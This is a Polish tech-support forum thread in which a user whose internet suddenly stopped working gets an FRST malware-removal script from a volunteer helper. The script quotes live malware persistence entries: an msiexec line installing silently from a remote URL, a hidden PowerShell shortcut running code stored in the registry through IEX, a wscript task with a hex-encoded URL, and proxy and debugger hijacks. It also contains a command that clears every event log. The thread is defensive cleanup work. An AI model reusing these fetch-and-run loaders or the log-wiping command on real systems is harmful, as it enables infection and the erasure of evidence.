bartek1877 Opublikowano 30 Kwietnia 2019 Zgłoś Udostępnij Opublikowano 30 Kwietnia 2019 Witam nagle nie działa mi internet po diagnostyce w przeglądarce komunikat "Zdalne urządzenie lub zasób nie akceptuje połączenia"Proszę o pomoce . Odnośnik do komentarza
Miszel03 Opublikowano 1 Maja 2019 Zgłoś Udostępnij Opublikowano 1 Maja 2019 By może ruch sieciowy idzie przez lokalny serwer proxy. Zrób zestaw raportów FRST. Odnośnik do komentarza
bartek1877 Opublikowano 2 Maja 2019 Autor Zgłoś Udostępnij Opublikowano 2 Maja 2019 Hej zrobiłem raport będe wdzieczny za pomoc. Pozdrawiam FRST.txt Addition.txt Odnośnik do komentarza
bartek1877 Opublikowano 3 Maja 2019 Autor Zgłoś Udostępnij Opublikowano 3 Maja 2019 W necie sporo ludzi pisze o tym robie wg instrukcji i bez zmian dziwne ze tak nagle z dnia na dzien takie cos.... Ostatecznie moge wgrac system ale wole tego uniknac .... Odnośnik do komentarza
jessica Opublikowano 9 Maja 2019 Zgłoś Udostępnij Opublikowano 9 Maja 2019 Cytat Ostatecznie moge wgrac system Domyślam się, że z powodu braku odpowiedzi już to zrobiłeś (niestety Moderator znów od kilku dni jest niedostępny) Jeśli jednak jeszcze nie sformatowałeś dysku, to: Uruchom FRST. Na klawiaturze naciśnij jednocześnie CTRL+Y. Otworzy się Notatnik - wklej do niego: Spoiler HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\ChromeHTML: -> "C:\Program Files (x86)\Eastness\Application\chrome.exe" "%1" <==== UWAGA RemoveDirectory: C:\Program Files (x86)\Eastness RemoveDirectory: C:\ProgramData\3B1FB597 RemoveDirectory: C:\Program Files (x86)\Firefox RemoveDirectory: C:\Program Files (x86)\MIO RemoveDirectory: C:\Users\user\AppData\Local\NPASRE RemoveDirectory: C:\ProgramData\{D8901DF3-52D2-9735-D414-09774E5682B9} RemoveDirectory: C:\Users\user\AppData\Local\SNAREA RemoveDirectory: C:\ProgramData\smQWqI6f.492 ProxyEnable: [S-1-5-19] => Proxy [funkcja włączona] ProxyServer: [S-1-5-19] => 127.0.0.1:8080 ProxyEnable: [S-1-5-20] => Proxy [funkcja włączona] ProxyServer: [S-1-5-20] => 127.0.0.1:8080 ProxyEnable: [S-1-5-21-1515640166-2867340543-1920175967-1000] => Proxy [funkcja włączona] ProxyServer: [S-1-5-21-1515640166-2867340543-1920175967-1000] => 127.0.0.1:8080 ManualProxies: 1127.0.0.1:8080 HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1SMdQWFUM1OTNSMdk8MTJSNkI1FdRWFUVWMWNWF8E8MH== /q <==== UWAGA IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] Task: {ADAF04DB-C932-40AC-8AE6-D7F35E4F97F1} - System32\Tasks\{10AADE66-C534-454D-A03C-063B83E53749} => C:\Windows\system32\pcalua.exe -a "C:\Users\user\Downloads\Windows Media Player 11 [1].exe" -d C:\Users\user\Downloads Task: {BFD671CA-1D53-4AF1-A286-130BB21765C0} - System32\Tasks\Chromium lerim => "wscript.exe" "C:\ProgramData\{D8901DF3-52D2-9735-D414-09774E5682B9}\dema.txt" "68747470733a2f2f6b6174756e61712e636f6d" "433a5c50726f6772616d446174615c7b44383930314446332d353244322d393733352d443431342d3039373734453536383242397d5c6d616e696e69" "433a5c50726f6772616d446174615c7b44383930314446332d353244322d393733352d (dane wartości zawierają 84 znaków więcej). <==== UWAGA Task: {DD3FAE7F-7209-4D6C-8E39-EE0BBBC1232F} - System32\Tasks\{6D3767A9-9E41-441F-B89A-DAB6E5E93AB4} => C:\Windows\system32\pcalua.exe -a C:\Users\user\Downloads\wmp11-windowsxp-x86-PL-PL.exe -d C:\Users\user\Downloads SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL = SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKLM-x32 -> {e5badea7-e1c2-fbf1-87ac-061d1440d15b} URL = SearchScopes: HKU\.DEFAULT -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = SearchScopes: HKU\S-1-5-21-1515640166-2867340543-1920175967-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = BHO: McAfee WebAdvisor -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> c:\program files (x86)\mcafee\SITEAD~1\x64\mcieplg.dll => Brak pliku CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/index.php?z=54320939c4d150bfeed4b3cg7zct2weqag0c7ofedc&q={searchTerms} CHR DefaultSearchKeyword: Default -> mystarting123 CHR Extension: (tTab) - C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\oonbcpdabjcggcklopgbdagbfnkhbgbe [2019-03-28] CHR HKLM\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [oonbcpdabjcggcklopgbdagbfnkhbgbe] - hxxps://clients2.google.com/service/update2/crx R2 3B1FB597; C:\ProgramData\3B1FB597\DCB5EEC9.dll [617984 2019-03-25] () [Brak podpisu cyfrowego] S2 NPASRE; C:\Users\user\AppData\Local\NPASRE\Snare.dll [830464 2017-05-23] () [Brak podpisu cyfrowego] <==== UWAGA S4 SNAREA; C:\Users\user\AppData\Local\SNAREA\Snare.dll [826368 2017-05-23] () [Brak podpisu cyfrowego] <==== UWAGA R2 TermService; C:\ProgramData\smQWqI6f.492\cR8rpo62.58U.dll [115712 2019-03-28] () [Brak podpisu cyfrowego] S2 avast; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /svc [X] S3 avastm; "C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe" /medsvc [X] S2 McAfee WebAdvisor; "C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe" [X] U3 aswbdisk; Brak ImagePath U3 avgbdisk; Brak ImagePath S3 iSafeKrnlBoot; system32\DRIVERS\iSafeKrnlBoot.sys [X] <==== UWAGA S3 mfesapsn; \??\C:\Program Files\McAfee\WebAdvisor\mfesapsn.sys [X] C:\Users\user\AppData\Roaming\CCBcXkRw.dll C:\Users\user\AppData\Roaming\CvJLtdsf.dll C:\Windows\Minidump\041619-13197-01.dmp HOSTS: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} FirewallRules: [{6EB533DD-505C-4674-87CC-541A6EDD4361}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe Brak pliku FirewallRules: [{E8CB4767-8CF2-43DA-A040-0F95301812D2}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe Brak pliku FirewallRules: [{28D40CD0-7BB2-49D0-BB54-E6CCFE2A9FCD}] => (Allow) C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe Brak pliku FirewallRules: [{438BE1C4-80B2-4563-9305-9096CFD5F9D2}] => (Allow) C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe Brak pliku FirewallRules: [{0F4D9CC7-1A88-43DB-A5EA-AC6A1C6AF31F}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abf050_y45ew40qtxxy45ew40qt.dat () [Brak podpisu cyfrowego] FirewallRules: [{23F45A2C-324E-4CF7-96B6-BC67BEC868F7}] => (Allow) C:\Program Files (x86)\MIO\loader\toshibaxmq01abf050_y45ew40qtxxy45ew40qt.dat () [Brak podpisu cyfrowego] HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-1515640166-2867340543-1920175967-1000\...\Run: [background_fault] => C:\Users\user\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-27] (AVAST Software s.r.o. -> AVAST Software) <==== UWAGA ShortcutAndArgument: iexplorer.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe => -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\mssccfile' -Name t;IEX $t.t; C:\Users\user\AppData\Local\RPNLJHFDBz EmptyTemp: Na klawiaturze naciśnij jednocześnie CTRL+S. W FRST kliknij na Fix (NAPRAW). jessi Odnośnik do komentarza
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się